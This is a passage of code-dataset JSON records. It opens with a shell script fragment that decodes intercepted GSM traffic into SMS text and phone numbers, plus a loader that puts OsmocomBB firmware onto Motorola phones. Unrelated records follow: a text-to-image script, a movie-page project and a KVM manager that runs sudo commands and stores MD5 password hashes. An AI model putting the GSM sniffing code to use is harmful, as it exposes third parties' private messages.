gsm_sms.sms_text\\\n -e gsmtap.arfcn -e frame.time -e gsm_a.dtap.cld_party_bcd_num 2>/dev/null \\\n| while read -r i; do\n\tlink=`echo \"$i\" | cut -c 1`;\n\tfrom=`echo \"$i\" | cut -d '\t' -f 2`;\n\tto=`echo \"$i\" | cut -d '\t' -f 3`;\n\ttext=`echo \"$i\" | cut -d '\t' -f 4`;\n\tarfcn=`echo \"$i\" | cut -d '\t' -f 5`;\n\ttime_=`echo \"$i\" | cut -d '\t' -f 6 | cut -c 14-22`;\n\tdtap=`echo \"$i\" | cut -d '\t' -f 7`;\n\tif [ \"$link\" == 1 ]; then\n\t\tlink='U';\n\telse\n\t\tlink='D';\n\tfi\n\tif [ \"$text\" == \"\" ]; then\n\t\ttext=\"Invalid MSG!!\";\n\tfi\n#\tmplayer -really-quiet /home/gsm/bin/a.wav 2>/dev/null &\n\tif [ \"$from\" != \"\" ] || [ \"$to\" != \"\" ]; then\n\t\tif [ \"$link\" == 'U' ]; then\n\t\techo \" ==============================[$nu]=================================\";\n\t\tstdbuf -oL printf \"[!]TIME:%s ARFCN:%3d TEL:%13s CenTel:%13s UP \\n\" \"$time_\" \"$arfcn\" \"$to\" \"$dtap\";\n#\t\tprintf \"MSG:%c $text\\n\";\n\t\t((nu++));\n\t\tstdbuf -oL printf \"[!]Msg:%c $text \\n\"\n#\t\techo -e \"Msg:\"$text;\n\t\tmplayer -really-quiet $GSMPATH/a.wav 2>/dev/null &\n\telse\n\t\techo \" ============================[$nu]===================================\";\n\t\tstdbuf -oL printf \"[*]Time:%s Arfcn:%3d Tel:%13s CenTel:%13s DOWN \\n\" \"$time_\" \"$arfcn\" \"$from\" \"$dtap\";\n\t\t((nu++));\n\t\tstdbuf -oL printf \"[*]Msg:%c $text \\n\"\n#\t\techo -e \"Msg:\"$text;\n#\t\tsleep 0.5;\n\t\tmplayer -really-quiet $GSMPATH/a.wav 2>/dev/null &\n\t\tfi\n\tfi\ndone\n"
},
{
"alpha_fraction": 0.5356850028038025,
"alphanum_fraction": 0.6127973794937134,
"avg_line_length": 21.574073791503906,
"blob_id": "636695c1a74eb416aeb534920805b4b6ab1cd822",
"content_id": "468d654e1ca129b43a82d0ee33a9d213b32602d2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 1235,
"license_type": "no_license",
"max_line_length": 154,
"num_lines": 54,
"path": "/bin/motoload.sh",
"repo_name": "hngbyr/gsm",
"src_encoding": "UTF-8",
"text": "#/bin/sh\n\n# motoload.sh\n# moded by 0x7678\n# Under GNU GPL \n\n# get config settings\nCONFIG=\"$HOME/.ini/config.ini\";\nGSMAPPATH=`cat \"$CONFIG\" | grep '^GSMAPATH=' | cut -d '=' -f 2`;\nif [ ! -f $CONFIG ];then\nzenity --info --text=\"错误代码0x05\" --title=\"程序错误\";\n echo \"error code 0x05,Please contact the system administrator!\";\n exit 1;\nfi\nif [ -z \"$1\" ]; then \n#\techo \"usage: $0 \\\"phone type\\\" [serial line] [l2_socket] [loader]\";\n#\techo \"suppoted phones: C115/C117/C123/C121/C118/C139/C140/C155\"\n#\techo \"example: $0 C139 /dev/ttyUSB2 /tmp/testsocket /tmp/testloader\"\n#\texit 0;\n\tmobile=C123;\nelse \n\tmobile=\"$1\"\nfi\n\nif [ -z \"$2\" ]; then \n\tstty=/dev/ttyUSB0; \nelse \n\tstty=\"$2\";\nfi\n\nif [ -z \"$3\" ]; then \n\tl2socket=\"\"; \nelse \n\tl2socket=\" -s $3\";\nfi\n\nif [ -z \"$4\" ]; then \n\tloader=\"\"; \nelse \n\tloader=\" -l $4\";\nfi\nid=`echo \"$stty\" | cut -b 12-`\ncase \"$mobile\" in \n\tC115|C117|C118|C119|C121|C123)\n\t\t# e88 \n\t\t# this is not ideal for C115 and C117,\n\t\t# but they seems to work..\n\t\techo -n \"Loading , press button on a phone...\";\n\t\txterm -T \"AC-GSM Channel [ $((id+1)) ] Data Windows\" -e \"$GSMAPPATH\"/osmocon $l2socket $loader -p \"$stty\" -m c123xor \"$GSMAPPATH\"/layer1.compalram.bin &\n\t\t;;\n\t*)\n\t\techo \"Unknown phone $1.\"\n\t\t;;\nesac\n"
}
] | 8 |
CuGBabyBeaR/pytxt2img
|
https://github.com/CuGBabyBeaR/pytxt2img
|
1d835036a14a122fbd82f3ac130bbbcff7cf28ea
|
979f0208327ad1768ec2e7cc240211c81dff8e8a
|
4bfe8a8e0a08fa59e16203866a159c4924013d52
|
refs/heads/master
| 2020-04-27T11:02:52.120833 | 2014-01-08T04:03:00 | 2014-01-08T04:03:00 | 15,706,718 | 1 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.545945942401886,
"alphanum_fraction": 0.5549549460411072,
"avg_line_length": 25.74698829650879,
"blob_id": "6c69b85fd0278af30fb9cdab93dd86297f2d7fb7",
"content_id": "316942f104a56654bc910d7225101026ad9bcd44",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2220,
"license_type": "no_license",
"max_line_length": 66,
"num_lines": 83,
"path": "/txt2img.py",
"repo_name": "CuGBabyBeaR/pytxt2img",
"src_encoding": "UTF-8",
"text": "import codecs, ConfigParser \nfrom PIL import Image,ImageDraw,ImageFont\n\ndef main():\n # read configuration\n print 'read configuration'\n config = ConfigParser.ConfigParser()\n config.read('config.cfg')\n\n bg = config.get('input','background')\n content = config.get('input','content')\n encoding = config.get('input','encoding')\n fontname = config.get('input','fontname')\n\n left = int(config.get('output','left'))\n top = int(config.get('output','top'))\n width = int(config.get('output','width'))\n height = int(config.get('output','height'))\n fontsize = int(config.get('output','fontsize'))\n leading = int(config.get('output','leading'))\n lineHeight = fontsize + leading\n\n filename = config.get('output','name')\n filetype = config.get('output','type')\n\n font = ImageFont.truetype(fontname, fontsize)\n\n # read content\n print 'read content'\n f = codecs.open(content,'r',encoding)\n text = f.read()\n if text[0] == u'\\ufeff':\n text = text[1:]\n f.close()\n\n # text process\n print 'text process'\n wraptext = [u\"\\u3000\"]\n l = fontsize\n for t in text:\n fi = t\n delta = font.getsize(t)[0]\n if t == '\\n':\n wraptext += [u\"\\u3000\"]\n l = fontsize\n elif l + delta > width:\n wraptext += [t]\n l = delta\n else:\n wraptext[-1] += t\n l += delta\n\n\n # draw text and save\n ltop = top\n filecounter = 1\n pattern = \"%s%04d.%s\"\n filename = filename.split('.')\n\n img = Image.open(bg)\n draw = ImageDraw.Draw(img)\n\n for i, txt in enumerate(wraptext):\n if ltop + lineHeight > height:\n name = pattern % (filename[0],filecounter,filename[1])\n print 'saving \\\"%s\\\" ...' % name\n img.save(name, filetype)\n filecounter += 1\n img = Image.open(bg)\n draw = ImageDraw.Draw(img)\n ltop = top\n\n draw.text((left, ltop), txt, font=font, fill='black')\n ltop += lineHeight\n pass\n\n name = pattern % (filename[0],filecounter,filename[1])\n print 'saving \\\"%s\\\" ...' % name\n img.save(name, filetype)\n pass\n\nif __name__ == '__main__':\n main()\n"
},
{
"alpha_fraction": 0.6458333134651184,
"alphanum_fraction": 0.65625,
"avg_line_length": 11,
"blob_id": "c32b794ae478f793e566f00fecd2b44a0d3f794e",
"content_id": "48053932acc31d553853906b37ba2cb4f6d60216",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 164,
"license_type": "no_license",
"max_line_length": 29,
"num_lines": 8,
"path": "/README.md",
"repo_name": "CuGBabyBeaR/pytxt2img",
"src_encoding": "UTF-8",
"text": "pytxt2img\n==================\n\n这是一个将文本转换成图片的工具,支持自动换行和自定义设置。\n\n设置文件为`config.cfg`\n\nby: CuGBabyBeaR\n"
}
] | 2 |
yetyman/media-center-website
|
https://github.com/yetyman/media-center-website
|
d2acc838800a84922072fc51cfc9cec8ffec7712
|
3cd602c21aa68ce605b0ecc56e76aa5606cd8ef4
|
6d9d8cf79f96ec2dd8ae2b0c02efa3cd74f0435e
|
refs/heads/master
| 2021-09-04T03:09:48.962360 | 2018-01-15T03:46:52 | 2018-01-15T03:46:52 | 117,459,804 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.4748971164226532,
"alphanum_fraction": 0.5580247044563293,
"avg_line_length": 44.730770111083984,
"blob_id": "6211d0c23545423399da37401bc48be21f924fd5",
"content_id": "5ec3bb283c8c5820d0309d1a04effbed622a9848",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1215,
"license_type": "no_license",
"max_line_length": 78,
"num_lines": 26,
"path": "/entertainment_center.py",
"repo_name": "yetyman/media-center-website",
"src_encoding": "UTF-8",
"text": "\"\"\"Calls code from fresh_tomatoes to generate and display a static webpage\"\"\"\r\nimport media\r\nimport fresh_tomatoes\r\n\r\n\r\ndef make_movies_list():\r\n \"\"\"generate a list of movies from hardcoded values\"\"\"\r\n itsjoke = media.Movie(\"its joke\",\r\n \"https://www.youtube.com/watch?v=D8cvgQJFDeo\",\r\n \"https://memes3.fjcdn.com/comments/Blank+_e3\"\r\n \"f147720c601dd7cb9e02fa45ca27b3.jpg\")\r\n theroom = media.Movie(\"oh hi mark\", \"https://www.youtube.com/watch?v=Z9cB\"\r\n \"0TjfIkM\",\r\n \"https://docs.python.org/2.7/_static/py.png\")\r\n knuckles = media.Movie(\"do u kno da wei?\", \"https://www.youtube.com/watch\"\r\n \"?v=H34qrTkhFz0\",\r\n \"https://i.guim.co.uk/img/media/794bb19154c0c0c3cf\"\r\n \"a2bc0b3f0e805f15cc2329/721_243_4595_2757/master/4\"\r\n \"595.jpg?w=1750&q=55&auto=format&usm=12&fit=max&s=\"\r\n \"654ed36d3271578f6317efa6786b93a4\")\r\n\r\n return [itsjoke, theroom, knuckles]\r\n\r\n\r\n# generating and opening the web page\r\nfresh_tomatoes.open_movies_page(make_movies_list())\r\n"
},
{
"alpha_fraction": 0.8012422323226929,
"alphanum_fraction": 0.8136646151542664,
"avg_line_length": 34.77777862548828,
"blob_id": "c15602f1317114e7aea2ed2fad6b8f900c713ed2",
"content_id": "7141fee254db3c246b65a1fa0dbeaaa3e3c80c5a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 322,
"license_type": "no_license",
"max_line_length": 128,
"num_lines": 9,
"path": "/README.md",
"repo_name": "yetyman/media-center-website",
"src_encoding": "UTF-8",
"text": "# media-center-website\na small project through Udacity, forking their fresh_tomatoes repo\n\nsimply clone the repository, run entertainment_center.py through a python interpreter and a website will be generated and opened\n\nall of my projects are available through GitHub at\nhttps://github.com/yetyman\n\nCopyright Jody Sowald 2018\n"
},
{
"alpha_fraction": 0.6465517282485962,
"alphanum_fraction": 0.6465517282485962,
"avg_line_length": 32.79999923706055,
"blob_id": "a8eac56beac179fa953d7ec1fe2fa029232c1968",
"content_id": "4b9f06be762619153a08377d22762f7dbf9b1885",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 348,
"license_type": "no_license",
"max_line_length": 63,
"num_lines": 10,
"path": "/media.py",
"repo_name": "yetyman/media-center-website",
"src_encoding": "UTF-8",
"text": "\"\"\"defines media types\"\"\"\r\n\r\n\r\nclass Movie(object):\r\n \"\"\"a light container for movie as it pertains\r\n to the entertainment center module's usage\"\"\"\r\n def __init__(self, movie_title, movie_trailer, poster_url):\r\n self.title = movie_title\r\n self.trailer_youtube_url = movie_trailer\r\n self.poster_image_url = poster_url\r\n"
}
] | 3 |
SteveMcGrath/cugmanager
|
https://github.com/SteveMcGrath/cugmanager
|
ec063d2d1081027c243548dcc8be11912971c585
|
d9cbd7fc605581680d5d72c08e1f198006110f2c
|
291d080af3b06f40b2bbe491f35508495ad17ce5
|
refs/heads/master
| 2021-01-01T17:56:53.813812 | 2012-04-02T22:44:16 | 2012-04-02T22:44:16 | null | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.4496992826461792,
"alphanum_fraction": 0.4548933804035187,
"avg_line_length": 31.087718963623047,
"blob_id": "7ede7f91d354f7feec9b58604f19b0384acaf95d",
"content_id": "2ccdfa6f94b99fec293d74f9c191a41f112e408a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3658,
"license_type": "no_license",
"max_line_length": 83,
"num_lines": 114,
"path": "/admin.py",
"repo_name": "SteveMcGrath/cugmanager",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n# encoding: utf-8\n'''\nadmin.py\n\nCreated by Steven McGrath on 2012-03-23.\nCopyright (c) 2012 __MyCompanyName__. All rights reserved.\n'''\n\nfrom ConfigParser import ConfigParser\nimport os\nimport sys\nimport getopt\nimport cugmanager\n\n\nhelp_message = '''\nThe help message goes here.\n'''\n\n\nclass Usage(Exception):\n def __init__(self, msg):\n self.msg = msg\n\n\ndef main(argv=None):\n os.chdir(os.path.dirname(__file__))\n config = ConfigParser()\n config.read('cugmanager.conf')\n name = None\n action = None\n ram = config.getint('Defaults', 'ram')\n disk = config.getint('Defaults', 'disk')\n address = config.get('Defaults', 'address')\n netmask = config.get('Defaults', 'netmask')\n router = config.get('Defaults', 'router')\n if argv is None:\n argv = sys.argv\n try:\n try:\n opts, args = getopt.getopt(argv[1:], 'a:r:', \n ['add=', 'remove=', 'ram=', 'disk=',\n 'address=', 'netmask=', 'router=',\n ])\n except getopt.error, msg:\n raise Usage(msg)\n \n # option processing\n for option, value in opts:\n if option in ('-a', '--add'):\n action = 'add'\n name = value\n if option in ('-r', '--remove'):\n action = 'remove'\n name = value\n if option == '--ram':\n ram = int(value)\n if option == '--disk':\n disk = int(value)\n if option == '--address':\n address = value\n if option == '--netmask':\n netmask = value\n if option == '--router':\n router = value\n \n except Usage, err:\n print >> sys.stderr, sys.argv[0].split('/')[-1] + ': ' + str(err.msg)\n print >> sys.stderr, '\\t for help use --help'\n return 2\n \n if name is not None and action is not None:\n s = cugmanager.Session()\n try:\n vm = s.query(cugmanager.VirtualMachine).filter_by(name=name).one()\n except:\n vm = None\n \n if action == 'remove':\n if vm is not None:\n print 'Powering off, deleting, and undefining the VM...'\n vm.delete()\n print 'Removing the VM allotment from the database...'\n s.delete(vm)\n s.commit()\n print 'Allotment removal complete.'\n else:\n print 'No VM by that name to remove.'\n if action == 'add':\n if vm == None:\n print 'Creating a new VM allotment based on the following:'\n print ' RAM: %4d MB' % ram\n print ' Disk: %3d GB' % disk\n print 'IP Address: %s' % address\n print ' NetMask: %s' % netmask\n print ' Router IP: %s' % router\n \n vm = cugmanager.VirtualMachine(name=name, ram=ram, disk=disk,\n address=address,\n netmask=netmask,\n router=router)\n upw = vm.gen_upw()\n s.add(vm)\n s.commit()\n \n print '\\nLogin information for this VM will be:'\n print ' VM Name: %s' % vm.name\n print 'Password: %s' % upw\n else:\n print 'A VM Allotment by that name already exists!' \n\nif __name__ == '__main__':\n sys.exit(main())\n"
},
{
"alpha_fraction": 0.4959130883216858,
"alphanum_fraction": 0.49892449378967285,
"avg_line_length": 30.62925148010254,
"blob_id": "cb44e7024638146fe8eabd15e5b801b6ac302ac5",
"content_id": "e35cdb5926229f89f05f6fc7f7f5942a3a52f881",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 9298,
"license_type": "no_license",
"max_line_length": 80,
"num_lines": 294,
"path": "/cugmanager.py",
"repo_name": "SteveMcGrath/cugmanager",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\nfrom sqlalchemy import (Table, Column, Integer, String, DateTime, Date, \n ForeignKey, Text, Boolean, MetaData, \n and_, desc, create_engine)\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy.orm import (backref, joinedload, subqueryload, sessionmaker,\n relationship)\nfrom ConfigParser import ConfigParser\nfrom commands import getoutput as run\nfrom hashlib import md5\nfrom random import choice\nimport string\nimport getpass\nimport cmd\nimport os\n\nconfig = ConfigParser()\nconfig.read('cugmanager.conf')\n\nBase = declarative_base()\nengine = create_engine('sqlite:///database.db')\nSession = sessionmaker(engine)\n\nclass VirtualMachine(Base):\n __tablename__ = 'vm'\n id = Column(Integer, primary_key=True)\n name = Column(Text, unique=True)\n ram = Column(Integer)\n disk = Column(Integer)\n address = Column(Text)\n netmask = Column(Text)\n router = Column(Text)\n passwd = Column(Text)\n upasswd = Column(Text)\n \n def start(self):\n run('sudo virsh start %s' % self.name)\n \n def stop(self):\n run('sudo virsh shutdown %s' % self.name)\n \n def restart(self):\n run('sudo virsh reboot %s' % self.name)\n \n def power(self):\n run('sudo virsh destroy %s' % self.name)\n \n def exists(self):\n if run('sudo virsh list --all | grep %s' % self.name) == '':\n return False\n else:\n return True\n \n def status(self):\n return run('sudo virsh domstate %s' % self.name).strip('\\n')\n \n def check_password(self, password):\n h = md5()\n h.update(password)\n return self.upasswd == h.hexdigest()\n \n def update_password(self, password):\n h = md5()\n h.update(password)\n self.upasswd = h.hexdigest()\n \n def gen_upw(self):\n upw = self._genpwd(length=12)\n self.update_password(upw)\n return upw\n \n def _genpwd(self, length=8, chars=string.letters + string.digits):\n return ''.join([choice(chars) for i in range(length)])\n \n def delete(self):\n if self.exists():\n self.power()\n run('sudo virsh undefine %s' % self.name)\n run('sudo lvremove -f %s/%s' % (config.get('Settings', 'lvpath'), \n self.name))\n \n def create(self, iso):\n if not self.exists():\n self.passwd = self._genpwd(length=12)\n opts = ['--autostart',\n #'--vnc',\n '--graphics vnc,password=%s' % self.passwd,\n '--noautoconsole',\n '--os-type=linux',\n '--accelerate',\n '--connect qemu:///system',\n '-n %s' % self.name,\n '--disk path=%s/%s,bus=virtio,cache=none' %\\\n (config.get('Settings', 'lvpath'), self.name),\n '--network bridge=%s' % config.get('Settings', 'network'),\n '--ram %s' % self.ram,\n '--cdrom %s/%s' % (config.get('Settings', 'iso_path'), iso),\n ]\n run('sudo lvcreate -L%sG -n %s %s' % (self.disk, \n self.name, \n config.get('Settings', 'vggroup')\n ))\n run('sudo /usr/local/bin/virt-install %s' % ' '.join(opts))\n \n def _iptables(self, allow=False):\n if self.console():\n rule = '-m state --state NEW -m tcp -p tcp --dport %s' % \\\n self.console()\n if allow:\n run('sudo iptables -D INPUT %s -j REJECT' % rule)\n #print run('iptables -A INPUT %s -j ACCEPT')\n return True\n else:\n #print run('iptables -D INPUT %s -j ACCEPT')\n run('sudo iptables -A INPUT %s -j REJECT' % rule)\n return True\n return False\n \n def enable_console(self):\n if self._iptables(allow=True):\n return True\n return False\n \n def disable_console(self):\n if self._iptables(allow=False):\n return True\n return False\n \n def console(self):\n display = run('sudo virsh vncdisplay %s' % self.name).strip('\\n')\\\n .strip(':')\n if display is not '':\n return int(display) + 5900\n return False\n 
\n \nVirtualMachine.metadata.create_all(engine)\n\n\nclass CLI(cmd.Cmd):\n prompt = 'cugkvm>'\n vm = None\n \n def __init__(self, vm):\n cmd.Cmd.__init__(self)\n self.vm = vm\n self.prompt = 'cugmanager[%s]> ' % self.vm.name\n \n def help_help(self):\n pass\n \n def do_start(self, s):\n '''start\n Start the virtual machine (Power ON)\n '''\n self.vm.start()\n \n def do_stop(self, s):\n '''stop\n Gracefully shuts the virtual machine down\n '''\n self.vm.stop()\n \n def do_power(self, s):\n '''power\n Forcefully turns the virtual machine off (Pulling the power)\n '''\n self.vm.power()\n \n def do_restart(self, s):\n '''restart\n Reboots the virtual machine gracefully\n '''\n self.vm.restart()\n \n def do_delete(self, s):\n '''delete\n Forcefully powers the virtual machine down and deletes the \n configuration and disk.\n '''\n print 'WARNING: This will permanently erase the VM!'\n if raw_input('Continue? [yes/NO]: ').lower() == 'yes':\n print 'Deleting VM...'\n self.vm.delete()\n else:\n print 'Aborting deletion...'\n \n def do_create(self, iso):\n '''create ISO_IMAGE\n Will create a new virtual machine with the ISO specified if there is\n currently no VM definition set.\n '''\n if iso in self._get_isos():\n s = Session()\n self.vm.create(iso)\n s.merge(self.vm)\n s.commit()\n print 'Networking Information\\n----------------------'\n print 'IP Address: %s' % self.vm.address\n print ' Netmask: %s' % self.vm.netmask\n print ' Gateway: %s' % self.vm.router\n print 'Nameserver: 4.2.2.2\\n'\n self.do_console('')\n else:\n print '%s is not a valid ISO Image.' % s\n \n def do_status(self, s):\n '''status\n Returns the current running status of the virtual machine.\n '''\n print self.vm.status()\n \n def do_console(self, s):\n '''console\n Controls access to the VNC Console session\n \n OPTIONS:\n \n enable Opens the console port & returns the connection\n information\n \n disable Closes the console port.\n \n <default> Returns the connection information.\n '''\n d = {True: 'Success', False: 'Failed'}\n if self.vm.status() == 'running':\n if s.lower() == 'enable':\n print d[self.vm.enable_console()]\n if s.lower() == 'disable':\n print d[self.vm.disable_console()]\n else:\n print 'VNC Port: %s\\nPassword: %s' % (self.vm.console(), \n self.vm.passwd)\n #print 'VNC Port: %s' % self.vm.console()\n else:\n print 'VM not running, please start the VM first.'\n \n def _get_isos(self):\n return os.listdir(config.get('Settings', 'iso_path'))\n \n def complete_create(self, text, line, begidx, endidx):\n if not text:\n return self._get_isos()\n else:\n return [s for s in self._get_isos() if s.startswith(text)]\n \n def do_exit(self, s):\n '''exit\n Exits cugmanager\n '''\n return True\n \n def do_updatepw(self, s):\n '''updatepw\n Updates the virtual machines\\' login password. 
'''\n s = Session()\n opw = getpass.getpass('Current Password: ')\n if self.vm.check_password(opw):\n pw1 = getpass.getpass('New Password: ')\n pw2 = getpass.getpass('Confirm Password: ')\n if pw1 == pw2:\n self.vm.update_password(pw1)\n s.merge(self.vm)\n s.commit()\n print 'Password Updated.'\n else:\n print 'Password Mismatch.'\n else:\n print 'Old Password doesnt match whats on file.'\n s.close()\n\ndef login():\n #os.chdir(os.path.dirname(__file__))\n os.system('clear')\n count = 0\n s = Session()\n print 'CUGManager Login'\n while count < 3:\n name = raw_input('VM Name: ').strip()\n passwd = getpass.getpass()\n #try:\n vm = s.query(VirtualMachine).filter_by(name=name).one()\n if vm.check_password(passwd):\n CLI(vm).cmdloop()\n s.close()\n return True\n #except:\n # pass\n count += 1\n print 'Invalid Password or VM name.\\n'\n\nif __name__ == '__main__':\n login()"
},
{
"alpha_fraction": 0.7657142877578735,
"alphanum_fraction": 0.7657142877578735,
"avg_line_length": 34,
"blob_id": "964e17005121ed7d6acaa8c274553181f6b58d8a",
"content_id": "f7cb1f2ab1b61a315dbfdee1e3e1a44f67695102",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 350,
"license_type": "no_license",
"max_line_length": 70,
"num_lines": 10,
"path": "/README.md",
"repo_name": "SteveMcGrath/cugmanager",
"src_encoding": "UTF-8",
"text": "### Under active Development\n\n#### TODO:\n\n* Develop Website to supplant the CLI app\n* Build new CLI app that will talk to Web API\n* Replace shell commands where possible with native python calls\n* Add capability to run over DHCP (removes need for providing IP info)\n* Flesh out admin.py to provide more functionality\n* Add error checking to admin.py\n"
}
] | 3 |
danielgmason/multiple-mortgages-calculator
|
https://github.com/danielgmason/multiple-mortgages-calculator
|
3a4749bcc1e1884d5a4b33339f747e4895e79639
|
f1dff462258a81aa7d917e8c3b4cc5565d74525d
|
853f53f51cc65f35d0c17ab34edfe11ece410b8a
|
refs/heads/master
| 2021-01-20T19:36:32.622979 | 2016-07-26T22:29:01 | 2016-07-26T22:29:01 | 64,258,932 | 1 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6703507900238037,
"alphanum_fraction": 0.7011052370071411,
"avg_line_length": 31.271318435668945,
"blob_id": "43b7efa7246d6cab0e235b31b440a4d9b2bf0cfc",
"content_id": "7246cb9a6826fd31faca64eb9323f3cf384ede97",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4162,
"license_type": "no_license",
"max_line_length": 146,
"num_lines": 129,
"path": "/simple.py",
"repo_name": "danielgmason/multiple-mortgages-calculator",
"src_encoding": "UTF-8",
"text": "''' mortgage_loan_calc1.py\ncalculate the monthly payment on a mortgage loan\ntested with Python27 and Python33\n'''\nimport math\ndef calc_mortgage_bank(bank_principal, bank_interest, bank_years):\n '''\n given mortgage loan principal, interest(%) and years to pay\n calculate and return monthly payment amount\n '''\n # monthly rate from annual percentage rate\n interest_rate_calc_bank = bank_interest/(100 * 12)\n # total number of payments\n payment_num_bank_calc = bank_years * 12\n # calculate monthly payment\n monthly_bank_payment = bank_principal * \\\n (interest_rate_calc_bank / (1-math.pow((1+interest_rate_calc_bank), (-payment_num_bank_calc))))\n return monthly_bank_payment\n\n\ndef calc_mortgage_family(family_principal, family_interest, family_years):\n '''\n this calculates the second part of the mortgage, that's provided outside\n of the bank loan\n '''\n # monthly rate form annual percentage rate\n interest_rate_family = family_interest/(100*12)\n # total number of payments\n payment_num_family = family_years * 12\n # calcullate monthly payments\n payment_family = family_principal * \\\n (interest_rate_family/(1-math.pow((1+interest_rate_family), (-payment_num_family))))\n return payment_family\n\n\n## EDITABLE INFORMATION\n# down payment\npurchase_price = 399000\ndown_payment = 100000\nmonthly_hoas = 610\nannual_taxes = 4915\nbank_mortgage_total = 100000\nmonthly_insurance = 80\n\n## BANK MORTAGE INFORMATION\n# bank mortgage amount\nbank_principal = bank_mortgage_total\n#bank annual interest\nbank_interest = 3.4\n# years to pay off mortgage\nbank_years = 30\n\n## FAMILY MORTAGE INFORMATION\n# family mortgage amount\nfamily_principal = purchase_price - down_payment - bank_principal\n#family annual interest\nfamily_interest = 2.0\n# years to pay off mortgage\nfamily_years = 30\n\n\n# calculate monthly payment amount frp, baml\nmonthly_payment_bank = calc_mortgage_bank(bank_principal, bank_interest, bank_years)\n\n# calculate monthly payment amount\nmonthly_payment_family = calc_mortgage_family(family_principal, family_interest, family_years)\n\n# combine the two mortages\n\n\ntotal_monthly_mortgage_amount = int(monthly_payment_bank) + int(monthly_payment_family)\n\ntotal_monthly_cost = total_monthly_mortgage_amount + monthly_hoas + (annual_taxes/12) + monthly_insurance\n# calculate total amount paid\ntotal_mortgage_amount = int(monthly_payment_bank * bank_years * 12) + int(monthly_payment_family * family_years * 12)\n\ntotal_30_year_costs = total_mortgage_amount + (annual_taxes*bank_years) + (monthly_hoas * 12 * bank_years) + (monthly_insurance * 12 * bank_years)\n# show result ...\n# {:,} uses the comma as a thousands separator\nprint('-'*40)\nprint 'START:::'\nprint('-'*40)\nprint 'BANK PORTION:'\nsf = '''\\\nFor a {} year mortgage loan of ${:,}\nat an annual interest rate of {:.2f}%\nyou pay ${:.2f} monthly'''\nprint(sf.format(bank_years, bank_principal, bank_interest, monthly_payment_bank))\nprint('-'*40)\nprint '2nd MORTGAGE PORTION:'\nsf = '''\\\nFor a {} year mortgage loan of ${:,}\nat an annual interest rate of {:.2f}%\nyou pay ${:.2f} monthly'''\nprint(sf.format(family_years, family_principal, family_interest, monthly_payment_family))\nprint('-'*40)\nprint 'TOTAL:'\nsf = '''\\\nThe Total Monthly Mortgage Payment is ${:,.2f}'''\nprint (sf.format(total_monthly_mortgage_amount))\nprint('-'*40)\nprint 'ADDITIONAL MONTHLY COSTS:'\nsf = '''\\\nMonthly HOAs : ${:,.2f}'''\nprint (sf.format(monthly_hoas))\nsf = '''\\\nMonthly Taxes : ${:,.2f}'''\nprint 
(sf.format(annual_taxes/12))\nsf = '''\\\nMonthly Insurance : ${:,.2f}'''\nprint (sf.format(monthly_insurance))\nprint('-'*40)\nprint 'TOTAL ALL-IN MONTHLY COSTS:'\nsf = '''\\\nTotal costs are : ${:,.2f}'''\nprint (sf.format(total_monthly_cost))\nprint('-'*40)\nprint 'LIFETIME OF MORTAGE (30 Years):'\nprint(\"Total mortgage paid will be ${:,.2f}\".format(total_mortgage_amount))\nprint(\"Total all-in costs (at current levels) will be : ${:,.2f}\".format(total_30_year_costs))\nprint('-'*40)\n\n''' result ...\nFor a 30 year mortgage loan of $100,000\nat an annual interest rate of 7.50%\nyou pay $699.21 monthly\n----------------------------------------\nTotal amount paid will be $251,717.22\n'''"
}
] | 1 |
changhongw/kymatio
|
https://github.com/changhongw/kymatio
|
9d846c302fa52264ebaa866b0ffa6e62824a4631
|
30b11751b1731b803ac0756da744b163a32d67b2
|
71a50b7a3ef1febe30560890fbf25282f003cb09
|
refs/heads/master
| 2022-10-26T01:10:34.524857 | 2022-06-02T07:31:22 | 2022-06-02T07:31:22 | 208,447,138 | 0 | 0 |
BSD-3-Clause
| 2019-09-14T13:51:37 | 2019-09-14T13:51:38 | 2022-04-20T16:41:09 | null |
[
{
"alpha_fraction": 0.5688073635101318,
"alphanum_fraction": 0.5753604173660278,
"avg_line_length": 24.433332443237305,
"blob_id": "504ee5175a5c6a620d6ea32e5982fdb4073b5474",
"content_id": "7028e1bcd737ca546feedfad91ab9943f9a813f0",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2289,
"license_type": "permissive",
"max_line_length": 81,
"num_lines": 90,
"path": "/kymatio/backend/tensorflow_backend.py",
"repo_name": "changhongw/kymatio",
"src_encoding": "UTF-8",
